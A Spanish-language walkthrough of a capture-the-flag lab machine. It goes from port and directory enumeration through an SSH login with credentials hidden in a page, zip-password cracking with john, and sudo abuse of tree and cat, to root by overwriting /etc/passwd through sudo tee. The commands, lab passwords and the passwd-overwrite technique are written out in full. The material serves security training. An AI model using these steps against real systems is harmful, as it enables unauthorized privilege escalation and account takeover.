#Enumeracion de Puertos, Servicios y versiones

map -Pn -n -sS -p- -sV --script vuln --min-rate 5000 -vvv -oN nmap 172.18.0.2

80/tcp   open  http    syn-ack ttl 64 Apache httpd
8899/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)


# fuzzing web

gobuster dir -u http://172.18.0.2 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -b 404 -t 50 -x php,txt,html,py,js,png,jpg

===============================================================
/.html                (Status: 403) [Size: 199]
/index.html           (Status: 200) [Size: 4655]
/images               (Status: 301) [Size: 233] [--> http://172.18.0.2/images/]
/css                  (Status: 301) [Size: 230] [--> http://172.18.0.2/css/]
/form.html            (Status: 200) [Size: 10232]
/app.html             (Status: 200) [Size: 7989]
/shell.php            (Status: 200) [Size: 1558]
/.html                (Status: 403) [Size: 199]
/server-status        (Status: 403) [Size: 199]
Progress: 1661144 / 1661152 (100.00%)
===============================================================

despues de chequear los directorios y codigos fuentes, conseguimos en /form.html 
lo que puede ser un usuario y contrasena

            <p style="visibility: hidden;">rosa:lacagadenuevo</p>

asi que probamos con el servicio ssh corriendo en el puerto 8899

ssh rosa@172.18.0.2 -p 8899
pass: lacagadenuevo

ahora somos rosa

sudo -l					| no podemos
find / -perm -4000 2>/dev/null		| todo normal
ls
cd ./-
ls
backup_rosa.zip  irresponsable.txt
cat irresponsable.txt
======================================================================================================================
Hola rosa soy juan como ya conocemos tus irresposabilidades de otras empresas te voy a dejar mi contraseña en un fichero .zip, captúralo para no volver a ser despedida.
Con cariño pero nos pones a todos en riesgo.
Seguro no trabajaste tambien en Decathlon ....
Un poco de acoso laboral......
======================================================================================================================

unzip backup_rosa.zip			| tiene clave

nos vamos a pasar el .zip a nuestro equipo atacante con scp
desde nuestra maquina atacante

scp -P 8899 rosa@172.18.0.2:/home/rosa/-/backup_rosa.zip .			| transferimos el .zip
zip2john backup_rosa.zip > hashzip						| extraemos el hash para crackear
john --wordlist=/home/darks/Desktop/Kali/diccionarios/rockyou.txt hashzip
backup_rosa.zip/password.txt:123123						| clave crackeada >> 123123
7z x backup_rosa.zip								| descomprimimos
pass: 123123
password.txt									| archivo extraido
cat password.txt
hackwhitbash									| clave de juan

ahora desde la maquina comprometida escalamos al siguiente usuario ===================================================

su juan
pass: hackwhitbash
sudo -l

User juan may run the following commands on de60e06f63d0:
    (carlos) NOPASSWD: /usr/bin/tree
    (carlos) NOPASSWD: /usr/bin/cat

con tree podemos listar, como con ls, asi que veamos que hay en /home/carlos

sudo -u carlos /usr/bin/tree /home/carlos/					| listamos el directorio de carlos y vemos un archivo 
password

sudo -u carlos /usr/bin/cat /home/carlos/password
chocolateado									| tenemos la clave de carlos asi que escalamos a carlos

su carlos
pass: chocolateado
sudo -l
pass: chocolateado
    (ALL : NOPASSWD) /usr/bin/tee

podemos ejecutar el binario tee como root...
este comando toma la salida de otro comando y lo guarda en un archivo....


primero vamos a leer el archivo /etc/passwd, copiamos su contenido y modificamos el nuevo archivo eliminando la primera x de la linea de root
y guardamos el nuevo archivo en nuestro directorio....


cat /etc/passwd										| leemos el archivo /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
juan:x:1001:1001:,,,:/home/juan:/bin/bash
carlos:x:1002:1002:,,,:/home/carlos:/bin/bash
rosa:x:1003:1003:,,,:/home/rosa:/bin/bash


echo 'root::0:0:root:/root:/bin/bash		                   | aqui creamos un nuevo archivo haciendo la modificacion						
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
juan:x:1001:1001:,,,:/home/juan:/bin/bash
carlos:x:1002:1002:,,,:/home/carlos:/bin/bash
rosa:x:1003:1003:,,,:/home/rosa:/bin/bash
' > passwd

ls
passwd  password										| tenemos el archivo modificado en nuestro directorio 

cat passwd | sudo -u root /usr/bin/tee /etc/passwd

aqui primero leemos el archivo passwd modificado que creamos en nuestro directorio y luego con tee ejecutandolo como root
guardamos esa salida en /etc/passwd. con esto lo que hacemos es sobreescribir el archivo original por el modificado.

el resultado es que ahora podemos escalar a root sin la clave

su root
whoami
#root
